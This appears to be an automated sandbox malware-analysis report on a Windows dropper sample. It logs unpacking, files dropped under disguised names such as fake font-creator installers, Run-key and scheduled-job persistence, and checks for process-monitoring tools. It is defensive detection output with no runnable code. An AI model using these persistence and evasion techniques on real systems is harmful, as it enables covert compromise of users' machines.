Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Unpacked PE file: 2.2.FT773VWATWFL9SRK5RTU4.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W;mvtnwoxp:EW;zodzljtk:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Unpacked PE file: 3.2.KOLH45MMED0OMDDRYHIG.exe.390000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oibhsmco:EW;rrchhzpy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oibhsmco:EW;rrchhzpy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 4.2.skotes.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oibhsmco:EW;rrchhzpy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oibhsmco:EW;rrchhzpy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oibhsmco:EW;rrchhzpy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oibhsmco:EW;rrchhzpy:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num.exe.7.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: real checksum: 0x2a10c2 should be: 0x2a3962
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: real checksum: 0x1d2034 should be: 0x1d0a13
Source: fontcreator.tmp.21.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: 9eba8044e7.exe.7.dr Static PE information: real checksum: 0x2c9e3f should be: 0x2cf312
Source: fontcreator.tmp.31.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: fontcreator.tmp.8.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: fontcreator.exe0.7.dr Static PE information: real checksum: 0x5ee9e5 should be: 0x5e3598
Source: 1553f88169.exe.7.dr Static PE information: real checksum: 0x2090fd should be: 0x20d196
Source: fontcreator[1].exe.7.dr Static PE information: real checksum: 0x5ee9e5 should be: 0x5e3598
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: real checksum: 0x2a10c2 should be: 0x2a3962
Source: random[1].exe.7.dr Static PE information: real checksum: 0x2c9e3f should be: 0x2cf312
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: real checksum: 0x1d2034 should be: 0x1d0a13
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x2090fd should be: 0x20d196
Source: file.exe Static PE information: real checksum: 0x2c9e3f should be: 0x2cf312
Source: fontcreator.tmp.10.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1d2034 should be: 0x1d0a13
Source: num[1].exe.7.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: fontcreator.exe.7.dr Static PE information: real checksum: 0x5ee9e5 should be: 0x5e3598
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: xtefpcuz
Source: file.exe Static PE information: section name: uqweurro
Source: file.exe Static PE information: section name: .taggant
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name:
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name: .idata
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name: mvtnwoxp
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name: zodzljtk
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name: .taggant
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name:
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: .idata
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name:
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: oibhsmco
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: rrchhzpy
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: oibhsmco
Source: skotes.exe.3.dr Static PE information: section name: rrchhzpy
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name: xtefpcuz
Source: random[1].exe.7.dr Static PE information: section name: uqweurro
Source: random[1].exe.7.dr Static PE information: section name: .taggant
Source: 9eba8044e7.exe.7.dr Static PE information: section name:
Source: 9eba8044e7.exe.7.dr Static PE information: section name: .idata
Source: 9eba8044e7.exe.7.dr Static PE information: section name: xtefpcuz
Source: 9eba8044e7.exe.7.dr Static PE information: section name: uqweurro
Source: 9eba8044e7.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: jfbmubxy
Source: random[1].exe0.7.dr Static PE information: section name: qpyydaeu
Source: random[1].exe0.7.dr Static PE information: section name: .taggant
Source: 1553f88169.exe.7.dr Static PE information: section name:
Source: 1553f88169.exe.7.dr Static PE information: section name: .rsrc
Source: 1553f88169.exe.7.dr Static PE information: section name: .idata
Source: 1553f88169.exe.7.dr Static PE information: section name:
Source: 1553f88169.exe.7.dr Static PE information: section name: jfbmubxy
Source: 1553f88169.exe.7.dr Static PE information: section name: qpyydaeu
Source: 1553f88169.exe.7.dr Static PE information: section name: .taggant
Source: fontcreator[1].exe.7.dr Static PE information: section name: .didata
Source: fontcreator.exe.7.dr Static PE information: section name: .didata
Source: fontcreator.exe0.7.dr Static PE information: section name: .didata
Source: fontcreator.tmp.8.dr Static PE information: section name: .didata
Source: fontcreator.tmp.10.dr Static PE information: section name: .didata
Source: is-5MQTR.tmp.11.dr Static PE information: section name: .didat
Source: fontcreator.tmp.21.dr Static PE information: section name: .didata
Source: fontcreator.tmp.31.dr Static PE information: section name: .didata
Source: is-GF03F.tmp.32.dr Static PE information: section name: .didat
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name:
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name: .idata
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name: mvtnwoxp
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name: zodzljtk
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name: .taggant
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name:
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: .idata
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name:
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: oibhsmco
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: rrchhzpy
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F5E33 push 00000010h; ret 0_3_007F5E36
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F5E33 push 00000010h; ret 0_3_007F5E36
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F5E33 push 00000010h; ret 0_3_007F5E36
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC005 push edi; ret 0_3_007FC006
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC005 push edi; ret 0_3_007FC006
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FE2C5 push ebx; ret 0_3_007FE2D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FE2C5 push ebx; ret 0_3_007FE2D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB35C push eax; iretd 0_3_007FB37D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB35C push eax; iretd 0_3_007FB37D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB350 pushad ; retf 0_3_007FB355
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB350 pushad ; retf 0_3_007FB355
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FBFF3 push ecx; iretd 0_3_007FC003
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FBFF3 push ecx; iretd 0_3_007FC003
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FCF98 push eax; iretd 0_3_007FCF99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FCF98 push eax; iretd 0_3_007FCF99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB793 push ss; iretd 0_3_007FB798
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB793 push ss; iretd 0_3_007FB798
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F5E33 push 00000010h; ret 0_3_007F5E36
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F5E33 push 00000010h; ret 0_3_007F5E36
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F5E33 push 00000010h; ret 0_3_007F5E36
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC005 push edi; ret 0_3_007FC006
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC005 push edi; ret 0_3_007FC006
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00802839 push E0654E62h; retf 0_3_00802861
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FE2C5 push ebx; ret 0_3_007FE2D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FE2C5 push ebx; ret 0_3_007FE2D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB35C push eax; iretd 0_3_007FB37D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB35C push eax; iretd 0_3_007FB37D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_008027A3 push 3545496Eh; iretd 0_3_008027A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB350 pushad ; retf 0_3_007FB355
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FB350 pushad ; retf 0_3_007FB355
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FBFF3 push ecx; iretd 0_3_007FC003
Source: file.exe Static PE information: section name: entropy: 7.971690331249355
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name: entropy: 7.731248083173909
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: entropy: 7.9848712865388904
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: oibhsmco entropy: 7.953838967160532
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.9848712865388904
Source: skotes.exe.3.dr Static PE information: section name: oibhsmco entropy: 7.953838967160532
Source: random[1].exe.7.dr Static PE information: section name: entropy: 7.971690331249355
Source: 9eba8044e7.exe.7.dr Static PE information: section name: entropy: 7.971690331249355
Source: random[1].exe0.7.dr Static PE information: section name: jfbmubxy entropy: 7.954398725393829
Source: 1553f88169.exe.7.dr Static PE information: section name: jfbmubxy entropy: 7.954398725393829
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name: entropy: 7.731248083173909
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: entropy: 7.9848712865388904
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: oibhsmco entropy: 7.953838967160532
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\hangbird\is-21RVC.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\nvfvsdksvc_x64.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\is-BB72E.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\hangbird\is-8C9AL.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File created: C:\Users\user\AppData\Local\Temp\SWJQ0719J9GFR3PZ91XO7LBLZA7.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\is-DEVD7.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-6RCEE.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fontcreator[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-FANHF.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\is-GF03F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\nvfvsdksvc_x64.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe File created: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\hangbird\Updater.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\ddETWExternal.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\ddETWExternal.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe File created: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\NVFTVRDLL64.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe File created: C:\Users\user\AppData\Local\Temp\7URDKE3CJSA37VV3INEEM0S4N1C.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\NVFTVRDLL64.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003147001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003146001\661f3ff865.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\is-5MQTR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-FANHF.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-6RCEE.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe File created: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\is-7T5A6.tmp Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe File created: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp File created: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\is-9EFK3.tmp Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9eba8044e7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1553f88169.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 661f3ff865.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Window searched: window name: Regmonclass
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9eba8044e7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9eba8044e7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1553f88169.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1553f88169.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 661f3ff865.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 661f3ff865.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
